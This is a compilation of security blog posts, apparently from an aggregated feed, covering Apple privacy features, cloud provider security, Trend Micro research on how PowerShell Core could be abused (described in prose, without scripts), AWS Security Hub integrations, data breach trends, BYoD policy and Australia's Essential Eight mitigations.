HomeKit Secure Video will encrypt video end-to-end from supported cameras into iCloud, free, kept for 10 days without consuming iCloud storage capacity. If you have an Apple TV or iPad on your home network, it will provide machine learning analysis and image recognition instead of performing any analysis in the cloud. This is an interesting area for Apple to step into. It doesn’t seem likely to drive profits because Apple doesn’t sell its own cameras, and security camera support is hardly driving phone and tablet brand choices. It’s almost like some Apple executive and engineers were personally creeped out by the lack of privacy protection in existing camera systems and said, “Let’s fix this.”

The key to HomeKit Secure Video is that it opens the security video market to a wider range of competitors while protecting consumer privacy. This is a platform, not a product, and it removes manufacturers’ need to build their own back-end cloud service and machine learning capabilities. Less friction to market with better customer privacy.

Apple created a culture of privacy, but will it survive?

These are only a few highlights to demonstrate Apple’s extension of privacy beyond its direct ecosystem, but WWDC was filled with examples. Apple continues to expand privacy features across all their platforms, including the new offline Find My device and customer tracking tool. They now block access to WiFi and Bluetooth data on iOS unless required as a core app feature, since they noticed it being abused for location tracking. Users can also now track the trackers, seeing when and where approved apps accessed their location. The upcoming Apple credit card is the closest thing we are likely to see to a privacy-respecting payment option. Developers will soon be able to mandate that speech recognition in their apps runs on-device, never exposed to the cloud. Privacy enhancements permeate Apple’s upcoming updates, and that’s before we hear anything about new hardware. Apple even dedicated an entire WWDC session to not only its own updates, but also examples of how developers can adopt Apple’s thinking to improve privacy within their own apps.

During John Guber’s The Talk Show Live, Craig Federighi stated that Apple’s focus on privacy started back in their earliest days when the company was founded to create ‘personal” computers. Maybe it did and maybe it didn’t, but Apple certainly didn’t build an effective culture of privacy (or noteworthy technical protection) until the beginning of the iPhone era. When Microsoft launched its highly successful Trustworthy Computing Initiative in 2002 and reversed the company’s poor security record, one of its founding principles was “Secure by Design”. During Apple’s developer-focused Platform State of the Union session, privacy took center stage as Apple talked about “Privacy by Design”.

Apple and other tech firms have already run into resistance building secure and private devices and services. Countries, including Australia, are passing laws to break end to end encryption and require device backdoors. U.S. law enforcement officials have been laying groundwork for years for laws requiring access, even knowing it would then be impossible to guarantee device security. China requires Apple and other non-Chinese cloud providers to hand over their data centers to Chinese companies, who can are legally required to feed information to the Chinese government. Apple’s competitors aren’t sitting idly by, with Google’s Sundar Pichai muddying the waters in a New York Times opinion piece which equates Google security with privacy, and positions Apple-style privacy as a luxury good. Google’s security is definitely industry-leading, but equating it with Apple-style privacy is disingenuous at best.

The global forces arrayed against personal privacy are legion. From advertising companies and marketing firms, to governments, to telecommunication providers which monitor all our internet traffic and locations, to the financial services industry, and even to grocery stores offering minor discounts if you’ll just let them correlate all your buying to your phone number. We have a bit of control over some of this tracking, but really we have little control over most of it, and even less insight into how it is used. It’s a safe bet that many of these organizations will push back hard against Apple, and by extension any of us who care about and want to control our own privacy.

Calling privacy a fundamental human right is as strong a position as any company or individual can take. It was one thing for Apple to build privacy into its own ecosystem, but as they extend this privacy outward, it is up to us to decide for ourselves whether we consider these protections meaningful and worthy of support. I know where I stand, but I recognize that privacy is highly personal and I shouldn’t assume a majority of the world feels the same, or that Apple’s efforts will survive the challenges of the next decades.

It’s in our hands now.

– Rich
(0) Comments
Subscribe to our daily email digest

DisruptOps: The Security Pro’s Quick Comparison: AWS vs. Azure vs. GCP

I’ve seen a huge increase in the number of questions about cloud providers beyond AWS over the past year, especially in recent months. I decided to write up an overview comparison over at DisruptOps. This will be part of a slow-roll series going into the differences across the major security program domains – including monitoring, perimeter security, and security management. Here’s an excerpt:

The problem for security professionals is that security models and controls vary widely across providers, are often poorly documented, and are completely incompatible. Anyone who tells you they can pick up on these nuances in a few weeks or months with a couple training classes is either lying or ignorant. It takes years of hands-on experience to really understand the security ins and outs of a cloud provider.

AWS is the oldest and most mature major cloud provider. This is both good and bad, because some of their enterprise-level options were basically kludged together from underlying services weren’t architected for the scope of modern cloud deployments. But don’t worry – their competitors are often kludged together at lower levels, creating entirely different sets of issues.

Azure is the provider I run into the most when running projects and assessments. Azure can be maddening at times due to lack of consistency and poor documentation. Many services also default to less secure configurations. For example if you create a new virtual network and a new virtual machine on it, all ports and protocols are open. AWS and GCP always start with default deny, but Azure starts with default allow.

Like Azure, GCP is better centralized, because many capabilities were planned out from the start – compared to AWS feature which were only added a few years ago. Within your account Projects are isolated from each other except where you connect services. Overall GCP isn’t as mature as AWS, but some services – notably container management and AI – are class leaders.

Proofs of Concept Abusing PowerShell Core: Caveats and Best Practices

by Michael Villanueva and John Sanchez (Threats Analysts)

Threats that abuse PowerShell continue to increase as attackers find ways to abuse it to deliver banking trojans, backdoors, ransomware, and cryptocurrency-mining malware, and, more recently, fileless malware and malicious Windows Management Instrumentation (WMI) entries. Indeed, PowerShell’s flexibility and capabilities make it a potent tool in cybercriminal hands. For instance, it can be abused to facilitate exploits, lateral movement within the compromised network, and persistence.

In January 2018, Microsoft announced the availability of PowerShell Core, a cross-platform and open-source version of PowerShell. While it’s currently under development, it’s similarly expected to draw cybercriminal attention since, like PowerShell, it can be abused to breach their way into other platforms apart from Windows.

We explored possible strategies attackers can employ when abusing PowerShell Core. These proofs of concept (PoCs) would help in better understanding — and in turn, detecting and preventing — the common routines and behaviors of possible and future threats that attackers might use. The PoCs we developed using PowerShell Core were conducted on Windows, Linux, and mac OSs. Most of the techniques we applied can be seen from previous threats involving PowerShell-based functionalities, such as the fileless KOVTER and POWMET. The scenarios in our PoCs are also based on the PowerShell function they use.

Note that there are caveats in successfully abusing PowerShell Core. For instance, PowerShell Core is not installed by default on any platform, which means malware creators cannot easily hack or compromise a machine that has no PowerShell Core installed. For Unix and Unix-like operating systems (OSs), the difference in the file system would require hackers to add a line or two to execute any malware. For example, a downloaded ELF file would not be executable, since its attribute needs to be modified in order for it to be executed. PowerShell Core’s functionalities are also under active development, so its security mechanisms against its abuse will also be fine-tuned.

PowerShell PowerShell Core
Versions 1.0 — 5.1 6.0 — 6.x
Update Policy Bug fixes and security updates Feature update, bug fixes, and security updates
Platforms Windows Multiplatform
Launched as powershell.exe pwsh.exe (Windows), pwsh (macOS and Linux)
Dependency .NET Framework .NET Core

Table: Comparison of PowerShell and PowerShell Core

As noted in the table above, PowerShell Core can be installed in systems running Windows 7 and later OSs, Linux (Kali, Fedora 27/28, Ubuntu, etc.), macOS 10.12+ (Sierra and later OSs), Windows IoT, and Nano Server.

PoCs of malicious activities involving PowerShell Core

Windows: DownloadFile scenario. The infection chain starts with a malicious document attached in a spam email. Once the document’s macro content is enabled, a command line along with a PowerShell Core script runs to download and execute the intended payload.



Figure 1. Infection chain of a possible threat that abuses PowerShell Core’s DownloadFile on Windows OS (top) and a snapshot of a sample PowerShell Core script that uses DownloadFile to retrieve the payload (bottom)

Linux and mac OS: DownloadString scenario. Since Linux and macOS terminals are the same, a threat that abuses PowerShell Core can be executed in both operating systems. Assuming that the arrival of the malware would be via spam email or an exploit, we simply created PowerShell scripts in order to complete the download and execution of the intended final payload. The initial script that was executed via terminal will then download another PowerShell Core script capable of retrieving the final payload and modifying its attribute to “executable”. This is because the downloaded file via terminal or PowerShell Core script in Linux and macOS environments is not executable by default.


Figure 2. Infection chain of a possible threat abusing PowerShell Core’s DownloadString on Linux and macOS


Figure 3. Snapshot of a sample PowerShell Core script that uses DownloadString to retrieve the payload (top), and the downloaded PowerShell script for retrieving and executing the final payload (bottom)

Windows: Abusing MultiPoolMiner and PowerShell Core. PowerShell Core can also be abused along with other legitimate and gray tools. For cryptocurrency mining-related activities, we tested out the open-source project MultiPoolMiner, which requires PowerShell Core to run properly.

When replicating this scenario, we first checked the start.bat file inside the MultiPoolMiner package, which includes default commands and parameters (miner wallet, username, workername, region, currency, etc.).  Our closer look reveals that it will execute a command via PowerShell Core (pwsh). If it is not installed on the system, it will download and install PowerShell Core, and proceed with the execution again.


Figure 4. MultiPoolMiner’s Start.bat downloading and executing PowerShell Core

After executing the batch file, it will start checking the system’s specifications and download all its supported miner applications and conduct a benchmark. This is done in order to install the most optimal cryptocurrency miner for the system. Figure 5 shows how the benchmarking and cryptocurrency mining processes are conducted.


Figure 5. MultiPoolMiner’s benchmarking and cryptocurrency mining processes

Best practices
Given the possible impact of PowerShell Core’s abuse, users and businesses should adopt best practices to reduce their exposure to threats that may abuse PowerShell Core:

  • Deploy security mechanisms such as behavior monitoring, which helps detect, monitor, and prevent anomalous and malicious routines and modifications from being fully executed in the system. A good behavior monitoring system not only blocks malware-related routines; it should also be able to monitor and prevent unusual behaviors, such as when PowerShell Core is invoked via malicious macro embedded in documents.
  • Implement defense in depth: Deploying a sandbox provides an additional layer of security by containing malicious scripts and shellcode. Employing firewalls as well as intrusion detection and prevention systems helps deter behaviors like command-and-control (C&C) communications and data exfiltration.
  • Apply the latest patches (or employ virtual patching) to prevent vulnerabilities from being exploited.
  • Enforce the principle of least privilege: Restrict or secure the use of PowerShell and/or PowerShell Core; disable or remove unnecessary and outdated plug-ins or components to further reduce the system’s attack surface.

This has been presented as “One (S)hell of a Threat: Gateway to Other Platforms” in the AVAR Conference, held on November 28, 2018 in Goa, India.

The post Proofs of Concept Abusing PowerShell Core: Caveats and Best Practices appeared first on .

Imperva Integration With AWS Security Hub: Expanding Customer Security Visibility

This article explains how Imperva application security integrates with AWS Security Hub to give customers better visibility and feedback on the security status of their AWS hosted applications.

Securing AWS Applications

Cost reduction, simplified operations, and other benefits are driving organizations to move more and more applications onto AWS delivery platforms; because all of the infrastructure maintenance is taken care of by AWS.  As with migration to a cloud service, however, it’s important to remember that cloud vendors generally implement their services in a Shared Security Responsibility Model.  AWS explains this in a whitepaper available here.

Imperva solutions help diverse enterprise organizations maintain consistent protection across all applications in their IT domain (including AWS) by combining multiple defenses against Application Layer 3-4 and 7 Distributed Denial of Service (DDoS) attacks, OWASP top 10 application security risks, and even zero-day attacks.  Imperva application security is a top-rated solution by both Gartner and Forrester for both WAF and DDoS protection.

Visibility Leads to Better Outcomes

WAF security is further enhanced through Imperva Attack Analytics, which uses machine learning technology to correlate millions of security events across Imperva WAFs assets and group them into a small number of prioritized incidents, making security teams more effective by giving them clear and actionable insights.

AWS Security Hub is a new web service that provides a consolidated security view across AWS Services as well as 3rd party solutions.  Imperva has integrated its Attack Analytics platform with AWS Security Hub so that the security incidents Attack Analytics generates can be presented by the Security Hub Console.

Brief Description of How the Integration Works

The integration works by utilizing an interface developed for AWS Security Hub for what is essentially an “external data connector” called a Findings Provider (FP). The FP enables AWS Security Hub to ingest standardized information from Attack Analytics so that the information can be parsed, sorted and displayed. This FP is freely available to Imperva and AWS customers on Imperva’s GitHub page listed at the end of this article.

Figure 1: Screen Shot of Attack Analytics Incidents in AWS Security Hub

The way the data flows between Attack Analytics and AWS Security Hub is that Attack Analytics exports the security incidents into an AWS S3 bucket within a customer account, where the Imperva FP can make it available for upload.

Figure 2: Attack Analytics to AWS Security Hub event flow

To activate AWS Security Hub to use the Imperva FP, customers must configure several things described in the AWS Security Hub documentation. As part of the activation process, the FP running in the customer’s environment needs to acquire a product-import token from AWS Security Hub. Upon FP activation, the FP is authorized to import findings into their AWS Security Hub account in the AFF format, which will happen at configurable time intervals.

It’s critically important that organizations maintain robust application security controls as they build or migrate applications to AWS architectures.  Imperva helps organizations ensure every application instance can be protected against both known and zero-day threats, and through integration with AWS Security Hub, Imperva Attack Analytics can ensure organizations always have the most current and most accurate status of their enterprise application security posture.

 

Security Hub is initially being made available as a public preview.  We are currently looking for existing Attack Analytics customers that are interested in working with us to refine our integration. If you’re interested in working with us on this please get in touch.  Once SecurityHub becomes generally available we intend to release our Security Hub integration as an open source project on Imperva’s GitHub account.

The post Imperva Integration With AWS Security Hub: Expanding Customer Security Visibility appeared first on Blog.

AWS Security Hub and Deep Security

Deep Security and AWS Security Hub integration

One of the biggest challenges in maintaining your security posture is visibility. You have security controls deployed throughout the stack, and each fo these tools is generating its own set of data points and has its own view of your deployment.

Managing the multitude of alerts and events from these tools can quickly get overwhelming. Enter AWS Security Hub.

Announced at AWS re:Invent 2018, this service is available to all aws users as a public preview. Trend Micro is product to be a supporting launch partner by allowing customers to send high value findings from Deep Security to this exciting new service.

What is AWS Security Hub?

AWS Security Hub provides a comprehensive view of your high priority security alerts and compliance status for your AWS deployment. By combining data from Amazon GuardDuty, Amazon Inspector, and Amazon Macie along with a host of APN partner solutions, the AWS Security Hub is a one-stop shop for security visibility.

Each data source provides various findings relevant to the tool. Amazon Macie will send findings related to data within Amazon S3 buckets it monitors, Amazon GuardDuty will provide findings based on the assessments it runs on your Amazon EC2 Instances, and so forth.

This not only helps you gain visibility and respond to incidents but also helps you monitor ongoing compliance requirements with automated checks against the Center for Internet Security (CIS) AWS Foundations Benchmark.

AWS Security Hub workflow

AWS Security Hub not only brings together this information across your AWS accounts but it prioritizes these findings to help you spot trends, identify potential issues, and take the relevant steps to protect your AWS deployments.

You can read more about AWS Security Hub on the AWS blog.

Instance Security Data

Trend Micro’s Deep Security offers a host of security controls to protect your Amazon EC2 instances and Amazon ECS hosts, helping you to fulfill your responsibilities under the shared responsibility model.

By providing technical controls like intrusion prevention, anti-malware, application control, and others, Deep Security lets you roll out one security tool to address all of your security and compliance requirements.

Read more about the specifics of Deep Security deployed in AWS on the Trend Micro AWS microsite.

As it sits protecting the instance, Deep Security generates a lot of useful security information for compliance, incident response, and forensics. With the integration with AWS Security Hub, high priority information generated by Deep Security will be sent to the service in order to centralize and simplify the view of your deployment’s security across multiple AWS services and APN solutions.

This complements the suite of existing AWS security services and existing Deep Security integrations with AWS WAF, Amazon GuardDuty, Amazon Macie, and Amazon Inspector helping to bring together all of your critical AWS security data in one, simple to use service.

Next Steps

The Deep Security integration with the AWS Security Hub is available today on GitHub. This simple integration runs as an AWS Lambda function in your account, sending high priority security events to the new service.

Get started today in just a few minutes with a few easy steps!

The post AWS Security Hub and Deep Security appeared first on .

Today’s Data Breach Environment: An Overview

By now, companies and consumers alike are well aware of the threat of a data breach. Large and small businesses across every sector have been targeted, and many customers are now familiar with the notification that their username, password or other details might have been compromised.

The unfortunate fact is that, despite efforts on the part of cybersecurity vendors and enterprises, the rate of infection and the vast number of threats continues to rise. Hackers are savvy and can adjust a sample just enough to fly under the radar of advanced security solutions. Worse still, once they’ve broken through the back door, cybercriminals can remain within systems and infrastructure for longer periods, stealing and snooping on more sensitive information in the process.

Today, we’re taking a closer look at the overarching environment of data breaches, including the stats and figures that demonstrate the size and impact of current threats, what takes place during and after a breach, and how enterprises can improve their protections.

By the numbers: Top data breach threats

There’s no shortage of facts and data when it comes to data breaches. According to current reports – including Trend Micro’s 2018 Midyear Security Roundup: Unseen Threats, Imminent Losses – some of today’s top threats include:

  • Ransomware: Although Trend Micro discovered only a slight increase in ransomware activity during the first half of 2018, coming in at a 3 percent rise, ransomware continues to pose a threat to enterprise systems everywhere. Even with a 26 percent decrease in the number of newly detected sample families, ransomware is still being put to work, encrypting files and enabling hackers to demand high Bitcoin ransoms.
  • Cryptomining: Unpermitted cryptocurrency mining is also a threat to enterprise security – and may be more dangerous than many organizations realize. Trend Micro researchers found a more than 140 percent increase in malicious cryptocurrency mining activity in the first six months of this year, compared to the same period last year. These programs operate in the background and steal valuable computing and utility resources, driving up costs and scaling back critical performance for legitimate business processes as a result.
  • BEC and email-served malware: Instances of business email compromise, wherein hackers target victims to enable fraudulent wire transfers, are also continuing to impact organizations with foreign partners all over the globe. Making matters worse is that this is far from the only threat that involves the critical communication channel of email – Verizon’s 2018 Breach Investigations Report found that 92 percent of all malware is still being served up through malicious emails, including through phishing attacks and the inclusion of infected links or attachments.

Mega breaches on the rise

Once an email recipient opens such a link or attachment, it’s akin to leaving the door wide open for intruders.

Current data shows that it takes an average of 191 days to even realize that a breach has taken place, according to Small Business Trends contributor David William. That’s about 27 weeks, or more than six months.

“This slow response to cyber-attacks is alarming,” William wrote. “It puts small businesses in a precarious position and demonstrates a dire need for cybersecurity awareness and preparedness in every business.”

Compounding this problem is the fact that the longer hackers are able to stay within business systems undetected, the more time they have to steal data and other sensitive intellectual property. This has contributed to a steep rise in mega breaches, Trend Micro research shows, which involve the exposure or compromise of more than one million data records.

Leveraging data from Privacy Rights Clearinghouse, Trend Micro researchers discovered that overall, there has been a 16 percent increase in mega breaches compared to 2017. During the first half of 2018 alone, 259 mega breaches were reported, compared to 224 during the same period in 2017.

Surprisingly, and unfortunately, the majority of these instances came due to unintended disclosure of data. Those that resulted from hacking or malware was slightly less, and a smaller percentage came as a result of physical data loss.

And, as researchers pointed out, the loss or compromise of data isn’t the only issue to be aware of here.

“There are substantial consequences for enterprises that are hit by data breaches,” Trend Micro researchers wrote. “Recovery and notification costs, revenue losses, patching and downtime issues, and potential legal fees can add up: A mega breach can cost companies up to $350 million.”

How does this happen? Typical steps within a data breach

One of the first things enterprises can do to bolster their security protections is to support increased awareness of data breach processes and what takes place before and during an attack.

In this way, stakeholders – particularly those within the IT team – can be more vigilant and proactive in recognizing security issues or suspicious behaviors that might point to the start of an attack.

As Trend Micro explained, there are several steps that most data breaches include:

  1. Research: Before an attack ever begins, hackers will often carry out research on their target. This might include background research on victims to support phishing and social engineering, or looking into the company’s IT systems to pinpoint unpatched weaknesses or other exploitable vulnerabilities. This step is all about looking for an entrance, or a springboard that cybercriminals can use to launch their attack.
  2. Attack: Once attackers have done their research, they use this knowledge for either a network-targeted attack, or a social attack.
  3. Pinpointing the network or social: As Trend Micro explained, a network attack involves malicious infiltration within the victim’s infrastructure, a particular platform or application. A social attack, on the other hand, relies on duping an employee user (with a malicious attachment, for example) into providing access to the company network or infrastructure.
  4. Data exfiltration: After successfully infiltrating the company’s systems, attackers seek out sensitive information, including often customer details and payment data. The hacker will then exfiltrate this data, usually to a command and control server belonging to the attacker.

Depending upon the business, the industry in which it operates and the type of data stolen, hackers will then either look to sell this information, or use it to support other malicious activity. Attackers will most often look for details like customer names, birth dates, Social Security numbers, email and mailing addresses, phone numbers, bank account numbers, clinical patient information or claims details.

“Hackers search for these data because they can be used to make money by duplicating credit cards, and using personal information for fraud, identity theft, and even blackmail,” Trend Micro stated. “They can also be sold in bulk in Deep Web marketplaces.”

The current breach environment is sophisticated and challenging for overall enterprise security. To find out more about current threats and how your organization can protect its most critical data and systems, connect with the security experts at Trend Micro today.

The post Today’s Data Breach Environment: An Overview appeared first on .

Malcom – Malware Communication Analyzer

Malcom – Malware Communication Analyzer

Malcom is a Malware Communication Analyzer designed to analyze a system’s network communication using graphical representations of network traffic, and cross-reference them with known malware sources.

This comes handy when analyzing how certain malware species try to communicate with the outside world.

Malcom Malware Communication Analyzer Features

Malcom can help you:

  • Detect central command and control (C&C) servers
  • Understand peer-to-peer networks
  • Observe DNS fast-flux infrastructures
  • Quickly determine if a network artifact is ‘known-bad’

The aim of Malcom is to make malware analysis and intel gathering faster by providing a human-readable version of network traffic originating from a given host or network.

Read the rest of Malcom – Malware Communication Analyzer now! Only available at Darknet.

CITP Call for Visitors for 2019-20

The Center for Information Technology Policy is an interdisciplinary research center at Princeton University that sits at the crossroads of engineering, the social sciences, law, and policy.

CITP seeks applicants for various visiting positions each year. Visitors are expected to live in or near Princeton and to be in residence at CITP on a daily basis. They will conduct research and participate actively in CITP’s programs.

For all visitors, we are happy to hear from anyone working at the intersection of digital technology and public life, including experts in computer science, sociology, economics, law, political science, public policy, information studies, communication, and other related disciplines.

Visitors

All visitors must apply online through the links below. There are three job postings for CITP visitors: 1) the Microsoft Visiting Researcher Scholar/Professor of Information Technology Policy, 2) Visiting IT Policy Fellow, and 3) IT Policy Researcher.

Microsoft Visiting Research Scholar/Professor of Information Technology Policy

The successful applicant must possess a Ph.D. and will be appointed to a ten-month term, beginning September 1st. The visiting professor must teach one course in technology policy per academic year. Preference will be given to current or past professors in related fields and to nationally or internationally recognized experts in technology policy.

Full consideration of the Microsoft Visiting Research Scholar/Professor of Information Technology Policy position is given to those who apply by the end of December for the upcoming year.

Apply here to become the Microsoft Visiting Research Scholar/Visiting Professor of Information Technology Policy


Visiting IT Policy Fellow

A Visiting IT Policy Fellow is on leave from a full-time position (for example, a professor on sabbatical). The successful appliant must possess an advance degree and typically will be appointed to a nine-month term, beginning September 1st.

Full consideration for the Visiting IT Policy Fellow is given to those who apply by the end of December for the upcoming year.

Apply here to become a Visiting IT Policy Fellow


IT Policy Researcher

An IT Policy Researcher will have Princeton University as the primary affiliation during the visit to CITP (for example, a postdoctoral researcher or a professional visiting for a year between jobs). The successful applicant must possess a Ph.D. or equivalent and typically will be appointed to a 12-month term, beginning September 1st.

This year we are also looking for a postdoctoral fellow to work on bias in AI in collaboration with an interdisciplinary team: Arvind Narayanan and Olga Russakovsky at Princeton and Kate Crawford at the AI Now institute NYU. We are interested in developing techniques for recognizing, mitigating and governing bias in computer vision and other modern areas of AI that are are characterized by massive datasets and complex, deep models. If you are interested specifically in this opening, please mention it in your cover letter.

Full consideration for the IT Policy Researcher positions is given to those who apply by the end of December for the upcoming year.

Apply here to become an IT Policy Researcher


Applicants should apply to either the Visiting IT Policy Fellow position (if they will be on leave from a full-time position) or the IT Policy Researcher position (if not), but not both positions; applicants to either position may also apply to be the Microsoft Visiting Research Scholar/Professor if they hold a Ph.D.

All applicants should submit a current curriculum vitae, a research plan (including a description of potential courses to be taught if applying for the visiting professor), and a cover letter describing background, interest in the program, and any funding support for the visit. References are not required until finalists are notified. CITP has secured limited resources from a range of sources to support visitors. However, many of our visitors are on paid sabbatical from their own institutions or otherwise provide some or all of their own outside funding.

Princeton University is an Equal Opportunity/Affirmative Action Employer and all qualified applicants will receive consideration for employment without regard to age, race, color, religion, sex, sexual orientation, gender identity or expression, national origin, disability status, protected veteran status, or any other characteristic protected by law.

All offers and appointments are subject to review and approval by the Dean of the Faculty.


If you have any questions about any of these positions or the application process, please feel free to contact us at *protected email*

Securing the BYoD Workplace

Letting employees’ personal phones, tablets and laptops loose within your corporate network does not sound like a good idea. But that doesn’t mean you can avoid it.

BYoD, or Bring Your own Device, refers to a policy which oversees employees using company networks and data on personal devices. IT staff are often wary of such policies, but management seem to like them as they allow for a more streamlined workflow and a reduction in the sizeable cost of buying and maintaining IT equipment.

Only 49 percent of UK organizations have installed formal BYoD policies, according to SailPoint’s most recent market survey. Of course, this doesn’t mean that employees are not using company networks with their own devices; it merely means there’s no policy to manage and control that process.

Fears around BYoD are not unfounded. Phishing links, bad intentions and everything in between reinforces the old cliché that humans are the weakest part of any organization. It is entirely understandable why an organization would be afraid of allowing an employee’s device as well as its applications and data onto a corporate network. Still, if you want a secure organization, they’re also a critical part of the solution.

Those fears are not doing anything to stop an increasingly mobile workforce nor the fact that network perimeters are quickly moving out of view.

A draconian ban on personal devices won’t halt their use any more than unhinged allowance of personal devices will deal with threats to your network. Both extremes are childish options for a modern company and should be flatly ignored. A sensible way between means, both accepting the reality of personal devices in the enterprise environment and crafting strategies to enable this new functionality, while shielding yourself from the threats it brings. It means getting a policy in place to handle this new reality.

So what do you need to think about when coming up with a BYoD policy?

How you’re going to protect your critical data assets from mistakes, insiders and criminals is entirely dependent on what those critical data assets are. Design cars? Then you’ll need to be protecting intellectual property going in and out of your organization. Sales teams will want to protect client lists and healthcare bodies will need to keep all manner of healthcare records under lock and key. Your first task should be to find what your critical data assets are and deciding on a hygienic way to handle them on personal and corporate devices.

This matters for compliance too. Your BYoD policy will have to be structured around the specific regulatory obligations of your industry. But there is one particular regulation which everyone will have to prepare for: The General Data Protection Regulation.

In the run up to the enforcement of GDPR on May 25th 2018, some have started to view BYoD policies with suspicion. A survey from Strategy Analytics last year showed increasing fears around BYoD on the part of European businesses. Ten percent of those polled said they expected the use of BYoD enabled tablets to decrease with the advent of the GDPR.

Creating a structure for the use of home devices within an organization, some may think, opens it up to compromise when it comes to compliance. After all, what’s to stop anyone from loading up their personal laptop with all the personal data they can get their hands on and making for the door?

A good BYoD policy for one.

The GDPR demands that you actively take account for the personal data that you have and how it might it be threatened, before implementing security controls and policies “appropriate to the risk.”

Aside from the personal data that might be handled by employees, you also have to account for the personal data that might be accessed on their personal devices.

Attached to those demands are fines of up to four percent of global turnover, or 20 million euros, whichever is higher. Given those figures, BYoD is an issue which you can no longer ignore.

The good news is there are a number of areas in which a good BYoD policy can ease your path to GDPR compliance. The landmark piece of regulation includes requirements about access control and breach reporting as well as the protection of personal information. A BYoD policy will help in all these areas.

You’ll need to demonstrate your compliance to regulators too, meaning that you will need to have documented policies, audits and reports that show you have an active BYoD policy.

Once you’ve thought through your compliance obligations, you’ll want to think about how you secure your network and data on personal devices. This is known as Enterprise Mobility Management.

For example, being able to remotely monitor and manage mobile sessions in the office or over secure SSL VPNs when users are out of the office is core to secure BYoD.

This matters for the everyday flow of data between personal devices and corporate networks just as much as it does for the actual physical mobility of those devices. Even in a world without hackers, users would still lose and damage their devices. It’s important then that critical data is still in your hands even when the device is not.

Organizations should encrypt corporate data and consider solutions that allow you to reach in to a lost device and remotely wipe it of sensitive data, keeping it out of attackers’ hands even if it isn’t in yours. Remote wipe technology can be a point of contention, considering you’re also dealing with the device owner’s data.

It’s also worth considering how this fits into your offboarding processes. Similar solutions can make sure that leaving employees don’t also leave with critical data and, even more importantly, access to corporate accounts

Even for current employees it might make sense to adopt a Principle of Least Privilege as a guiding reference. It states, simply, that people must be given the fewest possible rights and privileges they need to do their job. If an employee does not need access to a particular area or piece of data, then they should not have it. The proliferation of admin rights on corporate networks is still a leading cause of data breaches and privileged credentials, according to analyst firm Forrester, are misused in 80 percent of attacks. You will want to lock down access as a matter of priority.

Container security solutions can help you separate out your employees’ devices from their potentially hazardous personal data and apps. When using their device for company business, they can work inside a ‘corporate container’ which insulates both corporate and personal environments from risks to privacy and security.

Technological solutions like container security, SSL VPNs and network access controls are critical and can take a lot of the danger potential out of your users’ hands. Still, humans will always be your first line ofdefencewhen it comes to security; they are where a good deal of your efforts has to be focused. Staff must be rigorously educated on what they can and cannot do while using company networks, trained on proper onboarding and offboarding processes and updated on the best practices of cyber hygiene.

This process should ultimately be collaborative. Staff should be asked what they need, and how BYoD implementation would best fit them. Any security policy has to be tailored around those who are wearing or it will tear.

Users will have to be able to access the information and apps they need and easily reconfigure their devices so they can work safely on a corporate network. If they can’t they will find ways to which breach your security.

Gartner has predicted that 20 percent of BYoD programs will fail due to over complexity. To that end, low friction solutions are always the best choice when it comes user-facing security; one that accommodates them is less likely to be violated and more likely to result in a more secure network that works in harmony with its staff. 

BYoD will introduce a variety of unknown quantities to a network, posing a challenge to anyone who is trying to secure that network. But today’s workplace demands the kind of flexibility that BYoD brings and ignoring that fact won’t make it go away. A secure organization rises to meet the challenges posed by BYoD instead of letting them fly overhead.

About the author: Scott Gordon is the chief marketing officer at Pulse Secure, responsible for global marketing strategy, communications, operations, channel and sales enablement. He possesses over 20 years’ experience contributing to security management, network, endpoint and data security, and risk assessment technologies at innovative startups and large organizations across SaaS, hardware and enterprise software platforms.

Copyright 2010 Respective Author at Infosec Island

Cyber Security Lessons from Abroad – Australia’s Essential Eight

Cyber risk affects businesses all over the world, so it’s no surprise that countries have developed their own individual mitigation strategies to help combat this threat. But businesses can apply many of these strategies to their organisations to improve their overall cyber security posture, regardless of the geography that they are operating in.

A good example is the Essential Eight, created by the Defence Signals Directorate, the cyber security arm of the Australian Department of Defence (DoD). Designed to prevent the spread of malware, limit the extent of security incidents and support data recovery, the Essential Eight is a collection of best-practice recommendations that businesses can use to bolster their security protocols against attacks online.

The Essential Eight recommends the following actions to prevent malware from executing:

  • Application whitelisting: Creating a list of approved applications that are authorised to run within a system, automatically turning off untrusted operations.
  • Patching applications: Frequent security updates and patches to applications can prevent known vulnerabilities from causing problems, boosting overall cyber defences.
  • Disabling untrusted Microsoft Office macros: Disabling untrusted macros can prevent attackers from using them to download and use malware – a growing threat.
  • Application hardening: Uninstalling, or at least blocking access to, Adobe Flash Player, along with blocking untrusted Java code, can help prevent data and applications from being manipulated.

And the following to limit the impact of a breach and aid data recovery:

  • Backing up data on a daily basis: Regularly backing up data can ensure that important information can be restored quickly and efficiently in a worst-case scenario.
  • Patching operating systems: Operating systems can fall victim to vulnerabilities if they are not regularly patched. 
  • Restricting administrative privileges: Users should only be granted access to the data and applications that are crucial for the role that they are performing, and only those who handle tasks like system management or software installation should be granted these privileges.
  • Multi-factor authentication: Where useraccess to data or systems is subject to multiple forms of identification, such as entry of a unique code, passwords, fingerprint scans or other biometric data.

Used concurrently, these rules can help businesses prevent and mitigate the potential impact of cyber attacks. Importantly, the DoD proactively evolves the guidelines to keep pace with the ever-evolving cyber threat, ensuring that they remain applicable both now and in the future. 

Although each of these measures play important roles in helping organisations identify vulnerable assets and set appropriate defences for their networks and applications, there are two specific steps of the Essential Eight that stand out from the rest: whitelisting applications and restricting administrative privileges.

Application whitelisting

By creating a list of applications that are pre-authorised to be used on devices within a system, organisations can alleviate the potential risk of malware infecting a device, since operations that aren’t contained within the list will automatically be turned off.

Application whitelisting can be particularly useful when deployed by the users who are most likely to be the victim of a cyber attack, such as senior management, system administrators or those who have access to more sensitive data – often those who work in HR or finance departments. 

Enforcing application whitelisting across a company can seem like a daunting task, but the benefits of doing so for high-risk users far outweigh the time and effort required to do so. 

To execute application whitelisting, businesses should:

  1. Pinpoint the applications that are necessary for everyday operations and authorise these to be used across all systems.
  2. Implement a framework and rules to guarantee that only those applications which are on the pre-approved list can be executed.
  3. Maintain and update this framework regularly by using a change management programme.

Application whitelisting should not replace any antivirus or security software that is already being used within an organisation. Instead, it should complement this software by protecting data and lessening the number of vulnerabilities that may be present within the system.

Restricting administrative privileges

In addition to whitelisting, organisations can better secure their networks by restricting admin privileges solely to those who need the ability to change parts of a network or computer system. 

Company-wide admin privileges may be seen as a way of increasing user flexibility, since each individual is able to adapt their devices to suit their own needs, adding applications and changing settings as they please. 

But if this activity is left unsupervised, malicious attackers can more easily infiltrate and infect entire systems by compromising just one device, potentially causing catastrophe across a network. 

